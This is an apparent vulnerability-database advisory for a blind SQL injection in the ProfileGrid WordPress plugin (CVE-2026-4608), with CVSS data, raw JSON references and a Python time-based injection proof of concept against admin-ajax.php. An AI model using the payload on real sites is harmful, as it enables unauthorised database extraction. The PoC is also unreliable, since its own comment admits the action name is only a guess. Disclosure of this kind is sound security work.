Security Vulnerability Report
中文
CVE-2026-4608 CVSS 6.5 MEDIUM

CVE-2026-4608

Published: 2026-05-13 14:17:58
Last Modified: 2026-05-13 14:43:47

Description

The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to blind SQL Injection via the 'rid' parameter in all versions up to, and including, 5.9.8.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ProfileGrid – User Profiles, Groups and Communities <= 5.9.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Vulnerable parameter 'rid' based on the CVE description # Using time-based blind SQL injection payload payload = { "action": "pm_group_fields_save", # Example action name, actual name depends on plugin code "rid": "1 AND (SELECT SLEEP(5))" # SQL Injection payload } # Cookies for a low-privileged user (Subscriber) cookies = { "wordpress_logged_in_hash": "user_session_cookie_here" } try: print("Sending exploit request...") response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) # Check if the response time indicates a successful delay (SQLi executed) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed due to SLEEP().") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4608", "sourceIdentifier": "[email protected]", "published": "2026-05-13T14:17:58.357", "lastModified": "2026-05-13T14:43:46.717", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ProfileGrid – User Profiles, Groups and Communities plugin for WordPress is vulnerable to blind SQL Injection via the 'rid' parameter in all versions up to, and including, 5.9.8.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/trunk/includes/class-profile-magic-dbhandler.php#L192", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/trunk/includes/class-profile-magic-dbhandler.php#L555", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/trunk/includes/class-profile-magic-request.php#L2448", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/trunk/public/class-profile-magic-public.php#L4755", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3491679/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f58ed72-5a0b-4b43-ad76-7730c79741da?source=cve", "source": "[email protected]"}]}}